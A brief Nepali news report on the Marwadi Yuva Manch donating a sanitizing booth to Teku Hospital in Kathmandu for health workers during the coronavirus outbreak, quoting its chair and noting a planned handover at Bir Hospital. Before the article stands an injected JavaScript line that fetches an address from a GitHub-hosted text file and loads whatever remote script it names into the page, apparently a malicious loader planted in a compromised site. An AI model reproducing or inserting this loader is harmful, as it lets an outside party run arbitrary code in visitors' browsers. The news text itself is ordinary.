;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
चैत्र ३०,
काठमाडौँ | मारवाडी युवा मंचले स्वास्थ्यकर्मीहरुको सुरक्षालाई ध्यानमा राख्दै टेकु अस्पताललाई सेनिटाईजिङ बुथ हस्तान्तरण गरेको छ । मारवाडी युवा मंच कोरोना भाईरससँग निरन्तर लडिरहेका स्वास्थ्यकर्मीको स्वास्थ्यमा सहयोगी बनेको हो ।
कोरोना भाइरसको प्रकोपले ग्रसित समयमा अस्पतालमा सक्रिय भएका सम्पूर्ण स्वास्थ्यकर्मीप्रति मारवाडी युवा मंचको कृतज्ञता ।
‘यो सहयोगले बिरामीहरुको सेवामा निरन्तर खटिएका स्वास्थ्यकर्मी तथा बिरामीहरुको स्वास्थ्यको सुरक्षामा राहत मिल्नेछ’ मारवाडी युवा मंचका अध्यक्ष प्रविन अग्रवाल (चैनवाला) ले भने, ‘कोरोना भाइरसको प्रकोपले ग्रसित समयमा अस्पतालमा सक्रिय भएका सम्पूर्ण स्वास्थ्यकर्मीप्रति हामी आभारी छौं ।’
यसैगरि, मारवाडी युवा मंचका अनुसार आज वीर अस्पतालमा सेनिटाईजिङ बुथ हस्तान्तरण गरिने कार्यक्रम रहेको छ ।
फेसबुक प्रतिक्रियाहरु